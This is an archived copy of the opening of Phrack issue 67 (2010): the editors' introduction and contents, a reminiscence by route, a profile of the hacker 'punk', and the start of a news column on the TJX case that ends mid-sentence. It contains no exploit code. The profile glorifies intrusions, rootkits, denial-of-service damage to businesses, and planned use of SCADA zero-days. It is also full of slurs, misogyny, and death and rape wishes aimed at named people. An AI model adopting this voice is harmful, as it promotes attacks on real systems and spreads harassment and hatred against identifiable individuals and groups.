Phrack #67

EDB-ID:

42878

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

2010-11-17

                             ==Phrack Inc.==

		Volume 0x0e, Issue 0x43, Phile #0x01 of 0x10

|=----------------------------------------------------------------------=|
|=--------------------------=[ Introduction ]=--------------------------=|
|=----------------------------------------------------------------------=|
|=----------------------=[ By The Phrack Staff ]=-----------------------=|
|=----------------------------------------------------------------------=|
|=----------------------=[  November 17, 2010  ]=-----------------------=|
|=----------------------------------------------------------------------=|


        "The greatest trick the Devil ever pulled was convincing
         the world he didn't exist"
                                  --- Verbal Kint


        It's 1.00 a.m., nobody hits this secondary road. Heck, I'm almost
sure half of it doesn't have a line to remind you that you should share it
with upcoming cars. It's raining, but not too hard. I'm going home.

        It's Tuesday. What the hell am I doing out here, half an hour from
home, slowly driving under the rain? It's 1.05 a.m., I know this road, I
know this feeling, I recognize the shivering. I let it flow. Turn off the
music, I want silence.

        It's 2.00 a.m., nobody hits this machine at this time of the day.
Logs track me, but I'll clean them. I know this road, I know this feeling, 
I recognize the shivering. Turn on the music, the game is on. I'm sure 
someone else is around here, someone else has seen this # before.

        "I'll fuck you if you don't fuck me first, sir". Fair enough, this
is the rule. I'll go to sleep afterwards. I'm meeting some friends and I've
to take a train tomorrow. I'll sleep on the couch of someone I've never
seen before, yet I know him well.

        It's 1.00 a.m., 10 years later. It's a GPG email from the guy that
once offered me a couch. Then another time. I can count the times I've seen
him in person on two hands, but I would overflow a 'short' counting the
words we exchanged. We meet again, thought you disappeared. Things change,
indeed. Life gave us something to lose and we are holding on it. We lost
people, money, opportunities, that's why we hold on. Once a hacker, forever
a hacker, right? Let's finish this code. Let's visit this city.

        It's 2.00 a.m., today. Nothing in this story, in this Intro, is 
real. I wasn't there, this is not me. This is just a stream of ASCII
characters. Someone out there pulled a great trick and convinced the world
that security was a cool business. Someone is pulling even greater tricks
and makes money out of his ignorance living on others slightly bigger
ignorance. Somewhere, a crackdown on some kids proves to be necessary to
keep the 'mistery' alive, to keep the bandwagon going. Someone spies on
former fellow friends, 'cause that's worth millions. Everybody is happy and
we slowly fade away. Away, towards a new Underground.

        "I'll fuck you if you don't fuck me first, sir".

If you are shivering, if you have been there, if you feel it, you know what
I mean. PHRACK may die. Groups may die. Things as we know today may die.
The great trick might actually seem to work -- goodbye Underground, welcome
Security Industry. Not too fast.

        "Once a hacker, forever a hacker, right?"

        The Game is on.


                      -----( Phrack Issue #67 )-----


It's with incredible pleasure that we present you our newly released issue: 

 ______  _     _ ______  _______ _______ _     _      _ _   _______ ______ 
(_____ \(_)   (_|_____ \(_______|_______|_)   | |   _| U |_(_______|______)
 _____) )_______ _____) )_______ _       _____| |  (_     _)______       _  
|  ____/|  ___  |  __  /|  ___  | |     |  _   _)   _| O |_|  ___ \     / ) 
| |     | |   | | |  \ \| |   | | |_____| |  \ \   (_     _) |___) )   / /  
|_|     |_|   |_|_|   |_|_|   |_|\______)_|   \_)    |_n_| |______/   (_/   

                 - By the community, for the community. -


But wait ... the release date ... it sounds familiar ... OMFG!!! 


                                 \\\ ,
                                  \ `|
                                   ) (   .-""-.
                                   | |  /_  {  '.
                                   | | (/ `\   } )
                                   | |  ^/ ^`}   {
                                   \  \ \=  ( {   )
                                    \  \ '-, {   {{
                                     \  \_.'  ) }  )
                                      \.-'   (     (
                                      /'-.'_. ) (  }
                                      \_(    {   _/\
                                       ) '--' `-;\  \
                                   _.-'       /  / /
                            <\/>_.'         .'  / /
                        <\/></\>/.  '      /<\// /
                        </\>  _ |\`- _ . -/|<// (
                     <\/>    - _- `  _.-'`_/- |  \
                     </\>        -  - -  -     \\\
                      }`<\/>                <\/>`{
                      { </\>-<\/>_<\/>_<\/>-</\> }
                      }      </\> </\> </\>      {
                   <\/>.                         <\/>
                   </\>                          </\>
                    {`<\/>                     <\/>`}
                    } </\>-<\/>_<\/>_<\/>_<\/>-</\> {
                    {      </\> </\> </\> </\>      }
                    }                               }
                    {           H A P P Y           {
                    }                               }
                    {             25th              {
                 <\/>                               <\/>
                 </\>        B I R T H D A Y        </\>
                   `<\/>                          <\/>'
                jgs </\>-<\/>_<\/>_<\/>_<\/>_<\/>-</\>
                         </\> </\> </\> </\> </\>


Yes. That's right friends. This 67th issue is the celebration of Phrack's 
25th birthday. Happy birthday Phrack!


                    -----( Coming from the past )-----

Once upon a midnight dreary, while I pondered, weak and weary, over many a 
quaint and curious volume of forgotten lore...

Hello Cyberpals. It's your old friend Mike Schiffman AKA route AKA daemon9.
*Cyberhug!* It sure has been a long time! Well I'll be! You guys all look 
the same, young and eager and hungry... Me? I'm still here, just older and 
grayer and bit less conspicuous. Ok, I'll say it -- I'm downright honored 
that you crazy rascals still remember me.

It sure has been many a fortnight that I've been in this business. I mean, 
back in 1994, when I started poking around the scene in I was just a little
dork who use to work out a lot and bleach my hair white. Sure I was 
probably the first muscle-bound white-haired guy with giant computer chip 
tattoo on his back who had this tireless thirst for computers and hacking 
and writing all sorts of Usenet posts and papers -- but there would legions
more to come...

Now in 2010 I'm a much bigger and more experienced dork. It's more than 16 
years later. I have many more tattoos and the hair is getting white all by 
itself. And I reminisce... I look back and reflect on those days. Some of 
the stuff I use to do... My comp.security Usenet posts. "The Infinity 
Concept" e-zine, the precursor to my Phrack editorial days. My netcom.com 
.plan file. The PGP Attack FAQ.

I remember getting owned. I remember the first time my phones got done up 
and you miscreants forwarded my calls to bridge and told people I had died 
of AIDS. I remember my girlfriend at the time being scared shitless of what
was next. I remember my dox getting dumped to #phrack. I remember u4ea 
threatening to insert my SSN into the NCIC. I remember Bane and u4ea 
calling my house repeatedly. I also remember pictures of u4ea 
cross-dressing. I remember Bane getting backhanded by Synapse at Defcon 4. 
I remember Special Agent Peter Trahon and his partner who looked and 
sounded like Sargent Slaughter from GI JOE both from the San Francisco FBI 
Computer Crime task force picking me in a late model Crown Victoria and 
taking me to Max's Opera Cafe in Walnut Creek, CA and shaking me down for 
dirt on other cyber-dorks they were investigating... I remember teardrop. 
I remember Loki. I remember TQBF telling me that I had better be real 
careful in releasing the technique/code of ICMP covert channel tunneling as
I was "stepping on active people's toes"... I remember hooking an old 
landline phone up to my neighbor's wiring to call him and discuss it... I 
remember Carolyn Meinel... And her daughter Virginia at Defcon 5. I 
remember Eric Bloodaxe tapping me to be a Phrack editor a long with Voyager
and Redragon. I remember overshadowing them and bringing my own editorial 
team onboard... I remember how awesome it was to be a Phrack Editor. 

I remember how awesome Phrack was. How amazing it still is. Kudos to the 
current editorial team for keeping it alive, and here's to another 25 
years. Come find me then, and prophile me.

                                                XOXO Scene, 

                                        MS AKA Route AKA daemon9


                  -----( What you were waiting for )-----

Telling you that we're proud to release this issue would be an euphemism 
for many reasons including, and that is the most important, the pleasure
you will have while reading it. Oh and by the way, we apologize for the 
wait ...

08:21 |     --->| su [~su@201.6.x.y] #phrack
08:23 |     --->| arr[][] [arr@fledge.z.org] #phrack
08:29 |      su | halfdead, are you having trouble in man gcc this time? is
                  that why phrack's issue is so late?
08:30 |    Dreg | wtf
08:30 | @bab00n | hoho

Double. No. Triple private joke. You may have waited a long time but at 
least we made it before ZF #06 ;>

$ cat p67/index.txt

<--------------------------( Table of Contents )-------------------------->

 0x01  Introduction ....................................... Phrack Staff
 
 0x02  Phrack Prophile on punk ............................ Phrack Staff
 
 0x03  Phrack World News .................................. EL ZILCHO
 
 0x04  Loopback (is back) ................................. Phrack Staff
 
 0x05  How to make it in Prison ........................... TAp
 
 0x06  Kernel instrumentation using kprobes ............... ElfMaster
 
 0x07  ProFTPD with mod_sql pre-authentication ............ FelineMenace
 
 0x08  The House Of Lore: Reloaded ........................ blackngel
 
 0x09  A Eulogy for Format Strings ........................ Captain Planet
 
 0x0a  Dynamic Program Analysis and Software Exploitation . BSDaemon
 
 0x0b  Exploiting memory corruptions in Fortran programs .. Magma
       under UNIX/VMS
 
 0x0c  PHRACKERZ: Two Tales ............................... Antipeace 
                                                                & 
                                                            The Analog Kid
 
 0x0d  Scraps of notes on remote stack overflow ........... pi3
       exploitation
 
 0x0e  Notes Concerning the Security, Design and .......... The Philosopher
       Administration of Siemens DCO-CS Digital 
       Switching Systems                                                
 
 0x0f  Hacking the mind for fun and profit ................ lvxferis

 0x10  International Scenes ............................... various

<------------------------------------------------------------------------->

Have you ever noticed how some issues seemed to have a thematic? Consider 
for example p66. There are 4 papers dealing with heap exploitation. Now 
take p63. 5 papers are about (anti)reverse engineering and binary 
manipulation techniques and p62 clearly has a Windows color. Weird, isn't 
it? Coincidence? Bias in the uniform distribution of hacking playgrounds? 
I'll let you draw your own conclusions.

For this issue, with no doubts, the focus is on userland exploitation. Did
you really think that you had seen everything? Well how about debugging 
some heap? While FelineMenace gives you tricks using an usual practical 
case (hint: don't miss the source code), blackngel explains in detail the 
House Of Lore technique. Having troubles with fortify? Go read Captain 
Planet's excellent paper on format bugs as well as pi3's notes about 
cookies. It might be handy. 

Exploiting bugs is cool but finding them is de facto mandatory. That's when
BSDaemon's paper comes to play. Read it and learn about how to instrument 
programs. Now what about a new playground? Discover the joy of Fortran 
hacking with Magma. Oh btw he may just have lost it you know... 

Missing kernel fun? Why not reading ElfMaster's paper. You'll certainly 
learn a bit of useful things, truly. Missing the good old phreaking days? 
Thank The Philosopher for his contribution (you made us crazy man !@#) and
go learning about old school DCO-CS hacking.

The best for the end. We have the luck to have no more than 4 non technical
papers for this issue. You don't care? Fucking idiot, go away. 

Though we already thanked them, let us highlight EL ZILCHO, TAp, Antipeace,
The Analog Kid, lvxferis & the anonymous contributors of the "International
Scenes" phile. Phrack is without a doubt one of the most technical source 
of knowledge of the whole hacking scene thanks to its writers. But the 
most important aspect is not the technical one. Nowadays there are lots of 
impressive sources of information (blogs, books, conferences) freely 
available on Internet. However they all lack a soul. Phrack has a spirit 
and that's its true power.

Now as a demonstration of the so-called spirit, we have the brilliant work
of EL ZILCHO. Tired of the crap published on zdnet? Then have a taste of 
the Phrack World News. Eager to learn about life experiences? TAp is your 
man with one of the most fascinating papers of this issue. You should also
consider alternative literature with lvxferis' paper. Ahah.

Oh and if you're just passing by, attracted by the hacking culture but not 
yet ready/able to embrace it then Phrackerz paper is for you. It should 
bring you answers.

                                    -- The Phrack Staff

Ps: Oops sorry to forget o_O. It came to our attention after Pipacs' 
profile publication in p66 that whitehats profile were the most wanted one.
Unfortunately Theo was already on holidays [1] when we needed to start the
interview. Sorry guyz ;> Have fun anyway with punk!

[1] http://kerneltrap.org/mailarchive/openbsd-misc/2010/8/13/6186


                    -----( GreetZ for issue #67 )-----

As always and because our staff would have done nothing but shit without 
them, we'd like to thank (in no particular order)...

    - route/daemon9:      still able to make a kickass intro ;) 
    - The Analog Kid:     the spirited kid   
    - nullcon guyz:       nice people, visit their great country!
    - EL ZILCHO:          fuck1ng great job!
    - TAp:                peace bro :>
    - ElfMaster:          yet another kernel hax0r ;)
    - lvxferis:           who is this guy???
    - FelineMenace:       the LOLCats team counterattacks ;-)
    - spacewalker:        supportive & gifted belgian bro
    - blackngel:          malloc's worse enemy
    - Captain Planet:     fmt bugs' worse enemy (lake of inspiration 
                                                 detected)
    - argp & huku:        kudos for kickass answers in no time
    - BSDaemon:           oi. Tudo bom?
    - punk:               the whitehat k1ll3r
    - the VX scene:       thanks for the support & various exchanges over
                          past months. Special thanks to izee, herm1t and
                          EOF writers.
    - Magma:              take your pills gramps
    - The Philosopher:    well done
    - antipeace:          ~_o
    - pi3:                Hi bulba! (oops wrong one)
    - spy:                our IRC bot
    - halfdead:           su said you contributed on IRC ;)

    - the circle:         kudos for your past work.

...for their contributions and support. Touching isn't it? But so true :-)


                  -----( Phrack Magazine's policy )-----

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

                  -----( Contact Phrack Magazine )-----


            <  Editors           : staff[at]phrack{dot}org   >
            >  Submissions       : staff[at]phrack{dot}org   <
            <  Commentary        : loopback[@]phrack{dot}org >
            >  Phrack World News : pwned[at]phrack{dot}org   <

 
    Submissions may be encrypted with the following PGP key:
    (Hint: Always use the PGP key from the latest issue)


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PHRACK

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
=cK7U
-----END PGP PUBLIC KEY BLOCK-----


--------------------------------------------------------------------------------


                             ==Phrack Inc.==

                 Volume 0x0e, Issue 0x43, Phile #0x02 of 0x10

|=----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=----------------------=|
|=----------------------------------------------------------------------=|
|=------------------------=[  punk@phrack.org  ]=-----------------------=|
|=----------------------------------------------------------------------=|

|=---=[ Specifications

           Handle: punk 
              AKA: ihaq
    Handle origin: Feelin' lucky, punk?
      Produced in: Probably the missionary position.
             Urlz: HTTP://WWW.EROWID.ORG
        Computers: Intel p75, Intel P4, iMac 20", MacBook Pro 15.4"
       Creator of: Amnesia - The nightmare you forget exists
        Member of: The SYNDICATE, 2l8, Project CASSOULET, formerly Ac1dB1tch3z 
         Admin of: *.com, The LAB
         Projects: Amnesia - portable FreeBSD rootkit
                   Projekt Mayhem - like everyone else with a cool hat
		   Project CASSOULET!@#
            Codez: Amnesia - The most portable kernel module backdoor ever?
		   Opium - Attempt at a functional & portable solaris kit.
		   xlib.c - Xlib ENV overflow exploit from back in the day
		   with grsux bypass. 
		   vtesto - Full in-memory backdooring & intrusion.
		   omelette.c - Old eggdrop asynchronous DNS overflow.
     Active since: 1997
   Inactive since: Whenever the drugs kill me.

|=---=[ Favorites

          Actors: John Travolta, Samuel L. Jackson, Johnny Depp, Riley
                  Evans, Lexi Belle, Sash Grey, Eva Angelina.
           Films: Pulp Fiction, Fight Club, Fear and Loathing in Las Vegas
         Authors: Albert Hofmann
        Articles: p49-14, p53-5, p55-8, p55-12, p56-5, p60-7, p60-10, p66-8
		  p56-14, p57-8, p57-9, p58-4, p58-7, p58-8, p59-7, p61-6
        Meetings: I don't go to AA nor NA 
             Sex: Wild and dirty
           Books: LSD: My problem Child, PIHKAL, TIHKAL
           Novel: Your browser cache
         Meeting: Rita Marley
           Music: Jesselyn, Marcel Woods, Mark Knopfler, Pink Floyd, Bush,
                  Motorpsycho, Mudvayne, Tiesto, Johan Gielen, Jefferson 
                  Airplane, Leftfield, The Prodigy, Infected Mushroom.
         Alcohol: Anything > 21 years and beer. Also, red wine as it turns
                  innocent girls into sluts
            Cars: Bugatti veyron
           Girls: Should look and act like pornstars
           Foods: As long as it doesn't bleed
          I like: Hacking, drugs, sex and lulz
       I dislike: Whitehat faggots


|=---=[ Your current life in a paragraph

                Crazy. Always hacking, always traveling. Living like a
        vampire on meth. The amount of drugs in my bloodstream is the envy
        of every pharmacy on earth. Still trying new things, hungry for 
        knowledge. Living on the edge is the only way to live.

|=---=[ First contact with computers

                A mysterious black box appared in my parents house as a
	kid, shiny Intel p75, with a whopping 16MB of ram + A monster 
	850MB disk. Much to my dismay, it and the dialup connection it 
	had were both password protected. Now look what happened...  

|=---=[ Passions : What makes you tick

                The puzzle of how to ruin your life with computers. The
	race against the admins. The art of exploitation, the thrill 
	of the hunt. That said, nothing beats ruining someones life with 
	their own computers.

|=---=[ Entrance in the underground

                As so many hackers before me, it was in the dark ages of 
        EFnet, before chanfux and while some opers actually weren't flaming
        homosexuals. I stepped out of the shadows with 2l8.txt after many 
        years of largely ignoring the scene. route still "had time to
	manage that place".

        I joined Ac1dB1tch3z and never looked back.

|=---=[ Unix or Windows? 

		UNIX. I would rather have my balls dragged out thru my ass
	and stuffed in my fucking mouth rather than being stuck with 
	something that is designed to break, not to mention spy on you. I
	am probably always will be a FreeBSD guy. There simply is no 
	matching the power and agility of FreeBSD.

	As far as laptop/desktop OS is concerned I like OSX with it's
	FreeBSD core. It's not perfect, but it works, and looks pretty too.

|=---=[ Which research have you done or which one gave you the most fun?

                Learning to know the FreeBSD kernel like it was my
        girlfriend's pussy. For most of you this would be your mom's vagina
        or your dad's meat pole.

|=---=[ Personal general opinion about the underground

                The truly dark underground is awesome.
        The whitehat crowd who think they are underground make me sad.
        Do us all a favour and commit hara-kiri, whitehat maggots.
	I am truly impressed with the level of skill within the blackhat
	underground. The leaders of the world would crumble in fear if they
	had any idea whatsoever about the extent of this. 

	It's only too bad that all the whitehat posers, who's only "skill"
	is publishing other peoples work and posting XSS to
	Full-Disclosure.  Why the fuck would anyone post anything to FD
	except for lulz & phear. This is beyond me.  	

|=---=[ Memorable Experiences/Hack	

        Putting gay porn on EFnet.org, only to realize everyone thought
        it was the pix from the oper convention... watching these morons
        scramble in fail, lol @ dns cache poison theory. 
	P.S.: EFnet NS still vuln to file editing attack. 
	Joining Ac1dB1tch3z, the most awesome phorce in nature. 
        Owning my own ISP at age 14. 
	Taking out an entire block of businesses using land.c, only later 
	to realize they all went bankrupt. 
	Figuring out nonexec stack and heap bypass techniques.
        Rm'ing idiot #phrack ops from existance. 
	Pissing off the vice president of South Africa.
	Pissing on the squad car first time I was arrested.
	Getting my ass handed to me by susieq after not having hacked for
	like a year.
	Linking in hacked up EFnet servers for teh lulz.
	Being too high on mushrooms to get my ass to HAR opening day.

|=---=[ Memorable people you have met

        You can meet people now? I thought that was what faceblog was for.
	Al Gore - The biggest hypocrit alive...wish I had an axe..
	Krzee - Crazy nigger flew all the way to NL just to party with me.
	Chris - Made Miami tolerable.
	Grimey & Lance - Viva Montreal!@#
	nomed - mah nl bro.
	
|=---=| Memorable places you have been

	svn.freebsd.org	- best source kood
	cookie.efnet.nl aka irc.efnet.nl - best online chats
	irc.narc.net - the name says it all
	ircd-hybrid.org - hello world
	Chelsea C.'s inbox - omg. you dirty thing
	

|=---=[ Disappointing people you have met

        I don't socialize with failurez, but maybe I can interest you in
        sum CASSOULET?

[=---=[ Can you be a hacker/blackhat without hacking anything

		Can you be a crack addict without smokin' da rawkz? No. 
	That said, I believe alot of people have the hacking spirit and
	just dont know it. The hacker mindset is prevailant in many people,
	too bad some people use it for the wrong purpose or ignore it 
	completely. If you see the light at the end of the tunnel, you are
	looking the wrong way.
	

|=---=[ Ac1dB1tch3z experience

		It was a damp day, EFnet had just been raped and violated
	like a hooker in the midst of an etherbinge mixed in with ghb and
	rohypnol, yes, a dream for most of you, I know. A friend of mine
	approached me about joining some gathering of hackers to take of 
	the world. This was my entrance into Ac1dB1tch3z. It took only a 
	few minutes to realize the magnitude of what I had become part of.
	
	Even hardened hackers I had known for ages would come, see the 
	constant scroll of mad hax og run away with the tails between their
	legs. They say ignorance is bliss, but ignoring that people that 
	have been doing reliable remote ring 0 exploits since 2001 is just
	retarded. I grew alot during my time in AB, being around people who 
	actually have a clue and are trustworthy was really useful to me.
	Suddenly I had access to pick the brains of the best hackers on the 
	planet. 

	Developing weaponized exploits was part of daily routine. Creating
	and proving new backdooring concepts was considered a passtime.
	Owning was considered a way of life, and that usually meant owning
	whitehat niggerz. The daily brainstorming about 0day ideas is
	probably what I miss the most.
	
|=---=[ Wikileaks? Julian Assange? Adrian Lamo?

		I think wikileaks is doing important work, by that i mean 
	pissing on the hypocracy that is the U.S. Army. Assange is a weirdo.
	Who knows if he raped and or molested those women. I would have.
	Now Adrian, he's a real class act. Eternal attention seeker, liar
	and bullshitter. He would do humanity a favour by jumping in a pool
	of liquid lava.

|=---=[ Memorable places you have been

                Amsterdam. Montreal. Cities of Sin. These are the kind of
        places you will find whitehats dressed as female prostitutes to
        serve your perverted desires, or the place to smoke a good joint
        and eat some mushrooms with nekkid sluts running around.

|=---=[ Things you are proud of

        Ruining whitehat and blackhat posers lives.
	Being the darkest blackhat alive. 
	Skydiving.
	Licking an entire sheet of LSD.
	Crashing 2 cars before i was 7.
	Holding the world record for most consumed drugs.
	Not yet murdering abh.
	Being the bigger man and not blowing up FD archives.
	Pissing off the vice prez of South Africa. 
	Having had my own private beach.
	Not watching TV.
	Cutting someones finger off in 3rd grade.
	Growing A+ weed.
	Restraining from physically beating whitehats into a pulp.
	Still being sane after 35grams of mushrooms. 

|=---=[ Things you are not proud of

        Realizing that people like kingcope exist and are allowed to walk
        around without having their fingers cut off and columbian necktie
        hanging out their throats.
	Knowing Osmosis had nude pix of Estella, after I found out she used
	to be a dude.
	Not knowing that Joanna used to be a dude, until recently.
	Not printing 1k t-shirts with dan kam's unpublished gmail pass on
	it for HAR..

|=---=[ Opinion about dark underground. Still exist? Where?

                It very much does. Whitehats would have you believe
        otherwise, probably because their world would crumble if they had
        any clue about the magnitude of it. I could tell you where, but I
	would have to kill you. 
	
|=---=[ Most impressive hackers

        sd, sauron, anakata, xtix, twiz, sgrakkyu, susieq, scut, halfdead,
        the_uT, blkho, halvar, duke (even tho iDefense sux).

|=---=[ Opinion about security conferences

                You might as well go turn yourself in. Fed-cons. Only
        reason to go to any of them is to hand Dan Kaminsky his inbox.
        P.S.: Dan, your girlfriend is fucking psycho man, I heard she
        tried to violate loophole... Don't fight your own battles?
	However, if i had to choose one, it would be Blackhat/defcon:
	Nowhere else on earth can you piss on that many whitehats in one
	go, not to mention epic shit like getting lh to hand Dan Kam is own
	funeral.  

|=---=[ Opinion on Phrack Magazine 1985' ? 1995' ? 2005' ? '2009 ?

        Cool. Good. wtf?!. Getting there.

|=---=[ What you would like to see published in Phrack ?

                More articles about breaking the rules of the matrix. 
        More innovative advanced exploitation techniques. More hax news, 
        more ridicule, route got that part right. More whitehat rape.
	
|=---=[ Shoutouts to specific (group of) peoples

        Ac1dB1tch3z, zf0, h0no, UIA, #phrack ops, everyone@laggy, alloy,
        LaMaLo, the rest of 2l8, mad props to the ILF. 

|=---=[ Flames to specific (group of) peoples

                Whitehats can lick my nutz, spender smokes crack. I hope
        Dan Kaminsky dies from autoerotic asphyxiation. I know Ben Hawkes 
        will get gangraped soon. Well deserved, too. Fucking bug killer.
        Also: ret_ join your dead family. Alan..I hope the irish find you.

|=---=[ Quotes

                I wouldn't recommend sex, drugs or insanity for everyone, 
        but they've always worked for me.

                In a closed society where everybody's guilty, the only
        crime is getting caught. In a world of thieves, the only final sin 
        is stupidity.

                The Edge... there is no honest way to explain it because
	the only people who really know where it is are the ones who have 
	gone over.

                Computer games don't affect kids; I mean if Pac-Man
        affected us as kids, we'd all be running around in darkened rooms, 
        munching magic pills and listening to repetitive electronic music.

|=---=[ Anything more you want to say 

        	Hackers always w1n. And by hackers, I mean blackhats.
        This fuckton of scada 0days isn't going anywhere anytime soon, but
        you can be sure we will put them to good use.

        I would also like to thank the Phrack staff for this honor.

--------[ EOF


--------------------------------------------------------------------------------


                            ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x03 of 0x10

|=--------------------------------------------------------------------=|
|=-----------------------=[ Phrack World News]=-----------------------=|
|=-------------------------=[ by EL ZILCHO ]=-------------------------=|
|=----------------------=[ elzilcho@phrack.org ]=---------------------=|
|=--------------------------------------------------------------------=|


1. The TJX Case and the Longer Arm of the Law

2. Stuxnet, Cyberwar, Hacktivism and Political Hacking

3. Wikileaks and Whistleblowing

4. Scene Events: the Final Word

                          -------------------------


--[ 1. The TJX Case and the Longer Arm of the Law

When the going gets weird: The TJX crew / Probation for the narqs, tough 
sentences for the hard luck crowd / The longer-reaching arm of the law

Computer crime and hacking have always made for uncomfortable bed fellows, 
splitting hackers into two general camps; The laissez-fair consideration 
of those who know they commit several technical crimes before even getting 
out of bed in the morning, and those whose fear of the law drives them, 
essentially, straight -- condemned to endless nights in front of a 
debugger with nary an unauthorized rootshell to be seen.

So where to draw the fuzzy line under the TJX crew, from the manipulating 
Gonzales, who narqed out #phrack opers early in 2003, to the erstwhile 
seven-foot tall computer programmer the_uT who faces two years in the cage 
and a $172.5 million restitution for the writing of a simple computer 
program that most of us could have written at age fifteen, under the 
influence of ketamine or not?

PWN corespondents have viewed the original source code to 'blabla' and can 
attest that it consists of nothing more than a read loop from a raw socket 
on a high port outputting, unformatted and unfiltered, data to a file. To 
say that tcpdump is a far more sophisticated piece of software for data 
thiefing is not an exaggeration.

At least we can say with a comforting certainty that the fine old art of 
narqing like a pro will still get you out off the hook in times of phear 
and stress. As many old-timers will attest, narqing has been a fine 
defensive tradition among hackers over the years, with many well-loved 
figures of hacker mythology, from Chris Goggans to Agent Steal, being firm 
believers in the practice.

The TJX case has been a prominent reminder of the efficacy of the ancient 
technique of daubing one's mates in, with all sides planting knives 
between shoulder blades with sickening alacrity and producing some truly 
Olympic-grade scores in the Freestyle 100m Narq -- to wit, among others:

* Patrick 'eckis' Toey who faced a maximum sentence of twenty-two years, 
reduced to a paltry five years by merit of supplying 'extensive 
cooperation' to the authorities.

* Breakout act Jeremy 'horse addict' Jethro -- evidently the star of the 
case -- managing to not only narq out everyone he knew, but then managing 
to find his Saviour in Our Lord Jesus Christ AND being fined less than 
what he actually earned for his crimes (thus earning a nice little 
profit); He also managed to get his sentence commuted to probation, on top 
